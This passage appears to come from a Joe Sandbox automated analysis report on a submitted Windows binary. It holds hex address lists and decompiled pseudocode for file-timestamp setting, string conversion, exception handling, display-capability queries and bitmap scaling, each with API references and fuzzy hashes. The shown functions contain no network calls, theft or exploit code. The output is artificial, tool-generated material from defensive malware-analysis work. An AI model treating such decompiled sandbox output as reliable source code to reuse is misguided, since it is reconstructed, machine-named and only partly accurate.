0x0008929a
0x0008929d
0x0008929d
0x0008929d
0x000892a3
0x000892ab
0x000892be
0x000892c1
0x000892c3
0x000892c6
0x000892c7
0x000892e8
0x000892eb
0x000892eb
0x000892c9
0x000892c9
0x000892cb
0x000892d6
0x000892d6
0x000892d8
0x000892df
0x000892da
0x000892da
0x000892da
0x000892d8
0x000892ec
0x000892ee
0x000892ef
0x000892f2
0x000892f4
0x000892fe
0x00089308
0x000892f6
0x000892f6
0x000892f6
0x0008930d
0x0008930d
0x00089312
0x00089315
0x00089320
0x00089320
0x00089320
0x00089320
0x00089324
0x0008932b
0x0008932c
0x0008932f
0x00089332
0x00089332
0x00089334
0x00000000
0x00000000
0x0008934c
0x00089353
0x00089357
0x0008935a
0x0008935d
0x0008935f
0x0008935f
0x0008935f
0x00089361
0x00089364
0x00089367
0x00089369
0x00089371
0x00089377
0x0008937a
0x0008937d
0x0008937e
0x00089381
0x00089384
0x00089384
0x00089389
0x0008938c
0x00000000
0x00000000
0x000893a4
0x000893a9
0x000893ad
0x00000000
0x00000000
0x000893b1
0x000893b4
0x000893b5
0x000893b5
0x000893b7
0x000893ba
0x00000000
0x00000000
0x000893bc
0x000893bf
0x000893c6
0x000893c9
0x000893cc
0x000893e2
0x000893e2
0x000893e2
0x000893ce
0x000893ce
0x000893d0
0x000893d3
0x000893de
0x000893d5
0x000893d8
0x000893d8
0x000893d3
0x00000000
0x000893cc
0x000893c1
0x000893c1
0x000893c3
0x000893c3
0x00089317
0x00089317
0x0008931a
0x000893e5
0x000893e5
0x000893e7
0x000893e9
0x000893ec
0x000893ed
0x000893ee
0x000893ef
0x000893f7
0x000893f7
0x000893f7
0x000893f9
0x000893fc
0x000893ff
0x00089401
0x00089401
0x00089403
0x00089415
0x00089419
0x0008941c
0x00089423
0x0008942b
0x0008942b
0x0008942e
0x00089430
0x00089441
0x00089441
0x00089445
0x00089445
0x00089448
0x0008944a
0x0008944d
0x00000000
0x00089432
0x00089432
0x00089438
0x00089438
0x0008943c
0x0008944f
0x0008944f
0x00089453
0x00089454
0x00089456
0x00089458
0x00089499
0x00089499
0x0008949b
0x000894a8
0x000894a8
0x000894aa
0x000894ac
0x000894ad
0x000894ae
0x000894b5
0x000894b8
0x000894ba
0x000894ba
0x000894bb
0x000894bd
0x000894c0
0x000894c0
0x000894c2
0x000894c4
0x00000000
0x000894c4
0x0008949d
0x0008949f
0x00000000
0x00000000
0x000894a1
0x00000000
0x00000000
0x000894a3
0x000894a6
0x00000000
0x00000000
0x00000000
0x000894a6
0x0008945f
0x00089465
0x00089465
0x00089467
0x00089468
0x00089469
0x0008946a
0x00089471
0x00089474
0x00089476
0x00089477
0x00089479
0x00089486
0x00089486
0x00089488
0x0008948a
0x0008948b
0x0008948c
0x00089493
0x00089496
0x00089498
0x00089498
0x00000000
0x00089498
0x0008947b
0x0008947b
0x0008947d
0x00000000
0x00000000
0x0008947f
0x00000000
0x00000000
0x00089481
0x00089484
0x00000000
0x00000000
0x00000000
0x00089484
0x00089461
0x00089463
0x00000000
0x00000000
0x00000000
0x00089463
0x00089434
0x00089436
0x00000000
0x00000000
0x00000000
0x00089436
0x00089430
0x00000000
0x0008931a
0x00089315
0x0008923c
0x0008923e
0x00000000
0x00089240
0x00089256
0x0008925b
0x0008925d
0x00089269
0x0008926f
0x00089270
0x00089272
0x00089274
0x0008927f
0x0008927f
0x00089282
0x00089284
0x00089284
0x00089287
0x0008925f
0x0008925f
0x0008925f
0x00000000
0x0008925d
0x0008920c
0x0008920c
0x00089213
0x00089214
0x00089216
0x000894c8
0x000894cc
0x000894d1
0x000894d1
0x000894e0
0x000894e0

APIs

_strrchr.LIBCMT ref: 00089269
__alldvrm.LIBCMT ref: 0008946A
__alldvrm.LIBCMT ref: 0008948C

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction ID: 0906fa4c2276c27f5247f8eb2cf8e0d018f0918baf73a8c9d9e6c44e42603164
Opcode Fuzzy Hash: 35fd0d8be5dca6c89d1c4a519db20ace465afc24967252a61766d950e54f80d3
Instruction Fuzzy Hash: 20A13571A003869FDB21FE68C891BBEBBE5FF55310F1C41ADE5D99B282C6389942C750

Uniqueness

Uniqueness Score: -1.00%

Function 0006A2AB Relevance: 6.1, APIs: 4, Instructions: 127
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0006A2AB(void* __edx) {
				signed char _t40;
				void* _t41;
				void* _t52;
				signed char _t70;
				void* _t79;
				signed int* _t81;
				signed int* _t84;
				void* _t85;
				signed int* _t88;
				void* _t90;

				_t79 = __edx;
				E0007E360();
				_t84 =  *(_t90 + 0x1038);
				_t70 = 1;
				if(_t84 == 0) {
					L2:
					 *(_t90 + 0x11) = 0;
					L3:
					_t81 =  *(_t90 + 0x1040);
					if(_t81 == 0) {
						L5:
						 *(_t90 + 0x13) = 0;
						L6:
						_t88 =  *(_t90 + 0x1044);
						if(_t88 == 0) {
							L8:
							 *(_t90 + 0x12) = 0;
							L9:
							_t40 = E0006A194( *(_t90 + 0x1038));
							 *(_t90 + 0x18) = _t40;
							if(_t40 == 0xffffffff || (_t70 & _t40) == 0) {
								_t70 = 0;
							} else {
								E0006A444( *((intOrPtr*)(_t90 + 0x103c)), 0);
							}
							_t41 = CreateFileW( *(_t90 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
							 *(_t90 + 0x14) = _t41;
							if(_t41 != 0xffffffff) {
								L16:
								if( *(_t90 + 0x11) != 0) {
									E00070BDD(_t84, _t79, _t90 + 0x1c);
								}
								if( *(_t90 + 0x13) != 0) {
									E00070BDD(_t81, _t79, _t90 + 0x2c);
								}
								if( *(_t90 + 0x12) != 0) {
									E00070BDD(_t88, _t79, _t90 + 0x24);
								}
								_t85 =  *(_t90 + 0x14);
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								asm("sbb eax, eax");
								SetFileTime(_t85,  ~( *(_t90 + 0x1b) & 0x000000ff) & _t90 + 0x00000030,  ~( *(_t90 + 0x16) & 0x000000ff) & _t90 + 0x00000024,  ~( *(_t90 + 0x11) & 0x000000ff) & _t90 + 0x0000001c);
								_t52 = CloseHandle(_t85);
								if(_t70 != 0) {
									_t52 = E0006A444( *((intOrPtr*)(_t90 + 0x103c)),  *(_t90 + 0x18));
								}
								goto L24;
							} else {
								_t52 = E0006B66C( *(_t90 + 0x1040), _t90 + 0x38, 0x800);
								if(_t52 == 0) {
									L24:
									return _t52;
								}
								_t52 = CreateFileW(_t90 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
								 *(_t90 + 0x14) = _t52;
								if(_t52 == 0xffffffff) {
									goto L24;
								}
								goto L16;
							}
						}
						 *(_t90 + 0x12) = _t70;
						if(( *_t88 | _t88[1]) != 0) {
							goto L9;
						}
						goto L8;
					}
					 *(_t90 + 0x13) = _t70;
					if(( *_t81 | _t81[1]) != 0) {
						goto L6;
					}
					goto L5;
				}
				 *(_t90 + 0x11) = 1;
				if(( *_t84 | _t84[1]) != 0) {
					goto L3;
				}
				goto L2;
			}

0x0006a2ab
0x0006a2b0
0x0006a2bc
0x0006a2c3
0x0006a2c7
0x0006a2d4
0x0006a2d4
0x0006a2d8
0x0006a2d8
0x0006a2e1
0x0006a2ee
0x0006a2ee
0x0006a2f2
0x0006a2f2
0x0006a2fb
0x0006a309
0x0006a309
0x0006a30d
0x0006a314
0x0006a319
0x0006a320
0x0006a336
0x0006a326
0x0006a32f
0x0006a32f
0x0006a351
0x0006a357
0x0006a35e
0x0006a3a8
0x0006a3ad
0x0006a3b6
0x0006a3b6
0x0006a3c0
0x0006a3c9
0x0006a3c9
0x0006a3d3
0x0006a3dc
0x0006a3dc
0x0006a3ec
0x0006a3f0
0x0006a400
0x0006a410
0x0006a416
0x0006a41d
0x0006a425
0x0006a432
0x0006a432
0x00000000
0x0006a360
0x0006a371
0x0006a378
0x0006a437
0x0006a441
0x0006a441
0x0006a395
0x0006a39b
0x0006a3a2
0x00000000
0x00000000
0x00000000
0x0006a3a2
0x0006a35e
0x0006a303
0x0006a307
0x00000000
0x00000000
0x00000000
0x0006a307
0x0006a2e8
0x0006a2ec
0x00000000
0x00000000
0x00000000
0x0006a2ec
0x0006a2ce
0x0006a2d2
0x00000000
0x00000000
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,000680B7,?,?,?), ref: 0006A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,000680B7,?,?), ref: 0006A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,000680B7,?,?,?,?,?,?,?,?), ref: 0006A416
CloseHandle.KERNEL32(?,?,00000000,?,000680B7,?,?,?,?,?,?,?,?,?,?,?), ref: 0006A41D

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: 3b637a3edffb4f55e3c1b9f078623559ba07734387929e0bb715454570fa8af4
Instruction ID: 137ee9bd6f74dc246a5b40772f7dc73fada351f9d1d9eb055d9f2288b30c8899
Opcode Fuzzy Hash: 3b637a3edffb4f55e3c1b9f078623559ba07734387929e0bb715454570fa8af4
Instruction Fuzzy Hash: 8D41CF30288381AAE731EF24CC55BEFBBE6AB86700F04091DB5D0E3181D6689B489F13

Uniqueness

Uniqueness Score: -1.00%

Function 0008C099 Relevance: 6.1, APIs: 4, Instructions: 110
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E0008C099(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x9e668; // 0x136d1c5
				_v8 = _t34 ^ _t70;
				E00083DD6(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E0007EC4A(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E0007F350(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E0008A2C0(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00088518(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00091A30();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}

0x0008c0a1
0x0008c0a8
0x0008c0b4
0x0008c0b9
0x0008c0be
0x0008c0c3
0x0008c0c6
0x0008c0c8
0x0008c0c8
0x0008c0cd
0x0008c0e6
0x0008c0ec
0x0008c0f1
0x0008c190
0x0008c194
0x0008c199
0x0008c199
0x0008c1b5
0x0008c1b5
0x0008c0f7
0x0008c0ff
0x0008c103
0x0008c14f
0x0008c151
0x0008c153
0x0008c158
0x0008c16f
0x0008c177
0x0008c187
0x0008c187
0x0008c177
0x0008c189
0x0008c18a
0x00000000
0x0008c18f
0x0008c10a
0x0008c10c
0x0008c10e
0x0008c116
0x0008c133
0x0008c13d
0x0008c142
0x00000000
0x00000000
0x0008c144
0x0008c14a
0x0008c14a
0x00000000
0x0008c14a
0x0008c11a
0x0008c11e
0x0008c123
0x0008c127
0x00000000
0x00000000
0x0008c129
0x00000000

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,000889AD,?,00000000,?,00000001,?,?,00000001,000889AD,?), ref: 0008C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0008C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,000867E2,?), ref: 0008C181
__freea.LIBCMT ref: 0008C18A

Part of subcall function 00088518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0008C13D,00000000,?,000867E2,?,00000008,?,000889AD,?,?,?), ref: 0008854A

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: cd609beaee8925ea3e77ff2bebd89c5cde98d345ec2f8e94612bc7390bda7706
Instruction ID: 71ac99c278f8b1a426834158e5001841452b1d1debc535735b9a2eeb62c1e4af
Opcode Fuzzy Hash: cd609beaee8925ea3e77ff2bebd89c5cde98d345ec2f8e94612bc7390bda7706
Instruction Fuzzy Hash: 3F31BC72A0020AABEF25AF64DC89DEE7BB5FB45710F044129FC44D6252EB39CD51CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00082503 Relevance: 6.0, APIs: 4, Instructions: 48
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 20%

			E00082503(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00082B52(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0007FC0B(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00082D54(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E0008230D(_t29, _t32, _t37);
				if(_t25 != 0) {
					E0007FBD9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}

0x00082503
0x00082503
0x00082506
0x0008250b
0x0008250e
0x00082510
0x00082513
0x00082516
0x00082517
0x0008251a
0x0008251f
0x0008251f
0x00082522
0x00082526
0x00082529
0x0008252e
0x0008252b
0x0008252b
0x0008252b
0x00082531
0x00082537
0x0008253a
0x0008253c
0x0008253f
0x00082542
0x00082543
0x0008254c
0x00082551
0x00082554
0x0008255a
0x0008255d
0x00082560
0x00082563
0x00082564
0x00082567
0x00082572
0x00082576
0x00000000
0x00082576
0x0008257d

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0008251A

Part of subcall function 00082B52: ___AdjustPointer.LIBCMT ref: 00082B9C

_UnwindNestedFrames.LIBCMT ref: 00082531
___FrameUnwindToState.LIBVCRUNTIME ref: 00082543
CallCatchBlock.LIBVCRUNTIME ref: 00082567

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 058335f0139822caa6cad9ff540c18e6488165bd6d29cac809ea0b0d7e8b043f
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: 62011332400509BBCF12AF65CD01EEA3BBAFF58750F058015F95866121C336E961EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00079DBB Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00079DBB() {
				struct HDC__* _t1;
				struct HDC__* _t5;

				_t1 = GetDC(0);
				_t5 = _t1;
				if(_t5 != 0) {
					 *0xa8428 = GetDeviceCaps(_t5, 0x58);
					 *0xa842c = GetDeviceCaps(_t5, 0x5a);
					return ReleaseDC(0, _t5);
				}
				return _t1;
			}

0x00079dbe
0x00079dc4
0x00079dc8
0x00079dd6
0x00079de4
0x00000000
0x00079de9
0x00079df0

APIs

GetDC.USER32(00000000), ref: 00079DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00079DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00079DDB
ReleaseDC.USER32(00000000,00000000), ref: 00079DE9

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: e5081aa43cd80d095651966bf0d0e2a5a56127e5c7604b72893fef252a98563b
Instruction ID: b74fee8e5450e6a570b95bca719be95f2d9fc028f1275b9d01fd30efabca883c
Opcode Fuzzy Hash: e5081aa43cd80d095651966bf0d0e2a5a56127e5c7604b72893fef252a98563b
Instruction Fuzzy Hash: DBE0EC31985A21A7E3601BA4AC0DFCB3B54AB0E712F154016F6069A591EA784405CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00082016 Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00082016() {
				void* _t4;
				void* _t8;

				E00083437();
				E000833CB();
				if(E0008310E() != 0) {
					_t4 = E0008215C(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E0008314A();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x00082016
0x0008201b
0x00082027
0x0008202c
0x00082031
0x00082033
0x0008203e
0x00082035
0x00082035
0x00000000
0x00082035
0x00082029
0x00082029
0x0008202b
0x0008202b

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00082016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 0008201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00082020

Part of subcall function 0008310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0008311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00082035

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: e1aeb5640d15f164afe38ba084a88f6beb2745f88926d187c8c27e2d30575336
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: D8C00234004640D41C623AB1221A1ED07407BE2F84BA230C2ACC017203DE06070A9B37

Uniqueness

Uniqueness Score: -1.00%

Function 00079F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224
COMMON

Download Yara Rule

C-Code - Quality: 24%

			E00079F5D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				intOrPtr _v116;
				void* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v152;
				signed int _v160;
				intOrPtr _v164;
				char _v180;
				intOrPtr* _v192;
				intOrPtr* _v200;
				signed int _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr* _v232;
				intOrPtr* _v240;
				void* _v256;
				intOrPtr* _v264;
				void* __edi;
				signed int _t78;
				intOrPtr* _t84;
				void* _t86;
				signed int _t87;
				signed int _t90;
				short _t100;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t110;
				intOrPtr* _t116;
				intOrPtr* _t128;
				intOrPtr* _t131;
				intOrPtr* _t134;
				void* _t141;
				intOrPtr* _t146;
				intOrPtr* _t158;
				intOrPtr* _t161;
				signed int _t175;
				void* _t177;
				void* _t179;
				intOrPtr* _t181;
				signed int _t195;
				long long* _t197;
				long long _t200;

				_t200 = __fp0;
				if(E00079DF1() != 0) {
					_t141 = _a4;
					GetObjectW(_t141, 0x18,  &_v68);
					_t195 = _v0;
					asm("cdq");
					_t78 = _v72 * _v4 / _v76;
					if(_t78 < _t195) {
						_t195 = _t78;
					}
					_t177 = 0;
					_push( &_v120);
					_push(0x94684);
					_push(1);
					_push(0);
					_push(0x9546c);
					if( *0xc2174() < 0) {
						L19:
						return _t141;
					} else {
						_t84 = _v140;
						 *0x93260(_t84, _t141, 0, 2,  &_v136, _t179);
						_t86 =  *((intOrPtr*)( *_t84 + 0x54))();
						_t87 = _v160;
						if(_t86 >= 0) {
							_v152 = 0;
							_t181 =  *((intOrPtr*)( *_t87 + 0x28));
							_t146 = _t181;
							 *0x93260(_t87,  &_v152);
							if( *_t181() >= 0) {
								_t90 = _v160;
								asm("fldz");
								 *_t197 = _t200;
								 *0x93260(_t90, _v164, 0x9547c, 0, 0, _t146, _t146, 0);
								if( *((intOrPtr*)( *_t90 + 0x20))() >= 0) {
									E0007F350(0,  &_v136, 0, 0x2c);
									_v132 = _v84;
									_v136 = 0x28;
									_v128 =  ~_t195;
									_v120 = 0;
									_v124 = 1;
									_t100 = 0x20;
									_v122 = _t100;
									_t103 =  *0xc205c(0,  &_v136, 0,  &_v180, 0, 0);
									_v208 = _t103;
									asm("sbb ecx, ecx");
									if(( ~_t103 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t158 = _v224;
										 *0x93260(_t158,  &_v212);
										 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x2c))))();
										_t116 = _v220;
										 *0x93260(_t116, _v228, _v116, _t195, 3);
										 *((intOrPtr*)( *_t116 + 0x20))();
										_t175 = _v136;
										_t161 = _v240;
										_v220 = _t175;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t195;
										 *0x93260(_t161,  &_v228, _t175 << 2, _t175 * _t195 << 2, _v232);
										if( *((intOrPtr*)( *_t161 + 0x1c))() < 0) {
											DeleteObject(_v256);
										} else {
											_t177 = _v256;
										}
										_t128 = _v264;
										 *0x93260(_t128);
										 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 8))))();
									}
									_t104 = _v220;
									 *0x93260(_t104);
									 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
									_t107 = _v220;
									 *0x93260(_t107);
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))();
									_t110 = _v232;
									 *0x93260(_t110);
									 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 8))))();
									if(_t177 != 0) {
										_t141 = _t177;
									}
									L18:
									goto L19;
								}
								_t131 = _v192;
								 *0x93260(_t131);
								 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))();
							}
							_t134 = _v200;
							 *0x93260(_t134);
							 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 8))))();
							_t87 = _v208;
						}
						 *0x93260(_t87);
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))();
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E0007A1E5();
			}

0x00079f5d
0x00079f67
0x00079f80
0x00079f8d
0x00079f9c
0x00079fa3
0x00079fa4
0x00079faa
0x00079fac
0x00079fac
0x00079fb3
0x00079fb5
0x00079fb6
0x00079fbe
0x00079fbf
0x00079fc0
0x00079fcd
0x0007a1da
0x00000000
0x00079fd3
0x00079fd3
0x00079fe7
0x00079fed
0x00079ff2
0x00079ff6
0x0007a00d
0x0007a019
0x0007a01c
0x0007a01e
0x0007a028
0x0007a044
0x0007a048
0x0007a04f
0x0007a061
0x0007a06c
0x0007a08c
0x0007a09b
0x0007a0a3
0x0007a0ab
0x0007a0b4
0x0007a0b8
0x0007a0bd
